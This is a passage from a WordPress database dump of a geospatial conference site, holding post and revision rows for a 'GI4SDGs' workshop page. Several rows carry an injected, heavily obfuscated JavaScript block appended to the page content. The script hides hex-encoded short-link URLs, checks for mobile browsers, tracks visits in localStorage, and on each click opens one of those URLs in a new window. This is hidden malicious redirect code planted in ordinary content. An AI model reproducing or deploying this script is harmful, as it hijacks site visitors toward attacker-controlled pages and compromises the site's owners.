)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The Geospatial Information and SDG Nexus: GI4SDGs','','publish','closed','closed','','the-geospatial-information-and-sdg-nexus-gi4sdgs','','','2023-02-05 14:07:38','2023-02-05 14:07:38','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=2768',0,'dt_portfolio','',0),
(2769,1,'2022-10-13 23:29:40','2022-10-13 23:29:40','','The Geospatial Information and SDG Nexus: GI4SDGs','','inherit','closed','closed','','2768-revision-v1','','','2022-10-13 23:29:40','2022-10-13 23:29:40','',2768,'https://gsw2023.com/?p=2769',0,'revision','',0),
(2770,1,'2022-10-13 23:31:42','2022-10-13 23:31:42','','ws12m','','inherit','open','closed','','ws12m','','','2022-10-13 23:31:42','2022-10-13 23:31:42','',2768,'https://gsw2023.com/wp-content/uploads/2022/10/ws12m.jpg',0,'attachment','image/jpeg',0);
INSERT INTO `dnctiavkr_posts` VALUES
(2771,1,'2022-10-13 23:31:56','2022-10-13 23:31:56','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2770\"][/vc_column][vc_column width=\"3/4\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The Geospatial Information and SDG Nexus: GI4SDGs','','inherit','closed','closed','','2768-revision-v1','','','2022-10-13 23:31:56','2022-10-13 23:31:56','',2768,'https://gsw2023.com/?p=2771',0,'revision','',0),
(2772,1,'2022-10-13 23:32:22','2022-10-13 23:32:22','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2770\" img_size=\"1200x600\"][/vc_column][vc_column width=\"3/4\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The Geospatial Information and SDG Nexus: GI4SDGs','','inherit','closed','closed','','2768-revision-v1','','','2022-10-13 23:32:22','2022-10-13 23:32:22','',2768,'https://gsw2023.com/?p=2772',0,'revision','',0),
